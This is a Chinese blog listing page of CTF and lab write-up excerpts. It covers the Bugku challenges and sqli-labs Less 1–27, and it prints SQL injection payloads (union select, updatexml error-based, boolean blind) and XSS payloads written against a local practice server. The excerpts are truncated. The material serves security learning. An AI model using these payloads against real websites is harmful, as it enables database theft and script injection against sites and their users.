CTF
睦雨承风
学习,就是一个人的朝圣
展开
-
bugku 杂项 签到题
这个题算是很简单,没有难度的了,点开题之后会有一个二维码,微信扫描二维码关注bugku微信公众号就有答案了。题目答案:flag{BugKu-Sec-pwn!}原创 2019-10-26 22:25:14 · 438 阅读 · 0 评论 -
SQL练习Less1-10题解
SQL练习,用的自己装的服务器,127.0.0.1/sqli/Less-1题解(部分的结果附在了后面)(看的时候注意,有些是答案附在了后面)Less 1联合查询求列数?id=1' order by 4%23?id=1' order by 3%23(共3列)求显示位?id=1' and 1=2 union select 1,2,3%23求数据库名?id=1' ...原创 2019-08-24 08:38:22 · 617 阅读 · 0 评论 -
SQL练习 Less11-20
127.0.0.1/sqli/(注意:有些后面直接附上了答案)Less 111'or 1=1#求数据库长度(布尔型盲注)1' or length(database())=8#求数据库名(xpath)1'and updatexml(1,concat(0x23,database()),1)#求表数1' or (select count(table_name) fro...原创 2019-08-24 08:42:48 · 275 阅读 · 0 评论 -
SQL练习Less21-27题解
(注意:有些后面直接附上了答案)Less 21先找出 账号和密码之后用火狐登录后 用burp拦截 之后爆库名1' or updatexml(1,concat(0x7e,(database())),0) or '用小葵转制Base64编码发送邮件刷新之后burp重新拦截爆表名1' or updatexml(1,concat(0x23,(select group_...原创 2019-08-24 08:46:58 · 382 阅读 · 0 评论 -
Bugku web 成绩单
本题直接在页面中的查询栏输入:1' order by 4# (求出列数4列)1' and 1=2 union select 1,2,3,4# (求显示位)1'and 1=2 union select 1,2,database(),4# (求出数据库skctf_flag)1'and 1=2 union select 1,2,3,group_concat(table_name)from...原创 2019-08-24 08:53:49 · 307 阅读 · 0 评论 -
bugku秋名山车神
pythonimport requestsimport reurl = 'http://123.206.87.240:8002/qiumingshan/'s = requests.Session()source = s.get(url)ans = re.findall('<div>(.*?)=?;</div>', source.text)ans ...原创 2019-08-24 08:55:36 · 552 阅读 · 0 评论 -
xss题解
依然是自己地服务器http://127.0.0.1/xss答案:1.result: payload框加上 <script>alert(1)</script>2.result: payload框加上 ?keyword=%09+"+onclick%3Dalert(1)>+需要点击一下输入框。<br>?keyword=%09+" onmouseo...原创 2019-08-24 09:08:40 · 372 阅读 · 0 评论